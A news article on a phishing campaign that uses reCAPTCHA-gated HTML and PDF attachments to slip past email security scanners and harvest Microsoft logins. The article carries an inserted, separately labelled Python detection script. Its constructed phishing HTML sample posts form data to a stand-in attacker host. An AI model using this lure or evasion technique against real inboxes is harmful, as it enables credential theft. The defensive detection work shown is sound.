
Hackers spotted using CAPTCHAs to dodge email security scanners

The technique allows hackers to hide malicious links in HTML files

A CAPTCHA verification check on a data entry field

A new phishing campaign has been discovered using CAPTCHA verification tests to bypass email security scanners.

CAPTCHAs are cognitive tests that websites present to ensure that they're interacting with humans rather than automated bots.

According to cyber security company Avanan, the new campaign is using a technique that the company itself demonstrated over a year ago to bypass secure email gateways.

Email scanners typically compare links in emails against a known list of malicious domains gathered from threat intelligence feeds and blacklists. Sending a CAPTCHA instead of a direct URL effectively masks the phishing link from automated checks, as it takes human interaction to solve.

Phishing emails using CAPTCHAs attach them as HTML files that look clean to a secure email gateway, Avanan said. Some email clients may even render the HTML file when displaying the message if they find nothing dangerous in it.

If a victim opens the HTML file containing a CAPTCHA and solves it, the browser will then show them a phishing page asking them to enter their credentials.
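The bypass just described, seen from the gateway side, as an added example that is not part of the article or of Avanan's research: a small Python triage check that flags HTML attachments which embed a reCAPTCHA widget or post a form without exposing any plain links for URL reputation checks. The two sample attachments and the form's collection URL are constructed placeholders.

```python
# Added example, not the article's or Avanan's code: static triage of an HTML
# email attachment. A gateway that only matches <a href> targets against a
# blocklist sees nothing when the file's only outbound reference is a CAPTCHA
# widget, so this flags the widget itself as a reason to route the mail to review.
from html.parser import HTMLParser
from urllib.parse import urlparse

RECAPTCHA_PATH = "/recaptcha/"  # path of the standard Google reCAPTCHA api.js embed

class AttachmentAuditor(HTMLParser):
    """Collects outbound references and CAPTCHA markers from the HTML."""
    def __init__(self):
        super().__init__()
        self.script_srcs, self.form_actions, self.anchor_hrefs = [], [], []
        self.has_captcha_widget = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # valueless attributes such as async/defer map to None
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "a" and a.get("href"):
            self.anchor_hrefs.append(a["href"])
        # The widget renders from <div class="g-recaptcha" data-sitekey="...">
        if "g-recaptcha" in (a.get("class") or "").split() or "data-sitekey" in a:
            self.has_captcha_widget = True

def audit_html_attachment(html: str) -> dict:
    """Return a verdict plus the reasons an analyst would want to see."""
    p = AttachmentAuditor()
    p.feed(html)
    reasons = []
    if p.has_captcha_widget or any(RECAPTCHA_PATH in urlparse(s).path for s in p.script_srcs):
        reasons.append("embeds a CAPTCHA widget")
    if p.form_actions and not p.anchor_hrefs:
        reasons.append("posts a form but exposes no plain links for URL reputation checks")
    return {"suspicious": bool(reasons), "reasons": reasons, "form_actions": p.form_actions}

# Constructed sample of the attachment the article describes; the form action
# is a placeholder, not a real indicator.
PHISH_HTML = """<html><body>
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
<form action="https://attacker.example/collect" method="post">
  <div class="g-recaptcha" data-sitekey="PLACEHOLDER_SITE_KEY"></div>
  <input type="submit" value="View document"></form></body></html>"""

# Constructed benign sample: an ordinary HTML mailing with a plain link.
BENIGN_HTML = '<html><body><p>Read our <a href="https://example.org/news">news</a>.</p></body></html>'
```

A flagged file is a candidate for analyst review, not a verdict: legitimate HTML attachments almost never need a CAPTCHA, but the check is a heuristic and should sit alongside existing URL reputation lookups rather than replace them.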

Avanan has found attackers using this technique when sending emails from legitimate domains. In one case, the company said that a criminal used a compromised university domain to send an email containing a CAPTCHA.

Instead of embedding the test in an HTML file, the attacker uses a non-password-protected PDF purporting to be a faxed document. When opened, the PDF takes the user to a site with a CAPTCHA.

Upon solving the CAPTCHA, the phishing site presents the victim with a fake Microsoft authentication window asking for their login credentials.

Attackers typically use Google's reCAPTCHA service, which Google provides free to developers. Because security scanning systems can't realistically block Google, the reCAPTCHA is sure to be delivered, Avanan explains. Using a spoofed Microsoft OneDrive site adds another layer of apparent legitimacy to the phishing attack, the researchers added.

Avanan's best practices for avoiding the attack focus on user awareness rather than technical solutions.

Users should check URLs before filling out CAPTCHA forms, it said. They should also ask whether the PDF should have been password protected, and query the sender to find out whether they were in the office or working from home. "If working from home, odds are that they did not fax it," the company concluded.
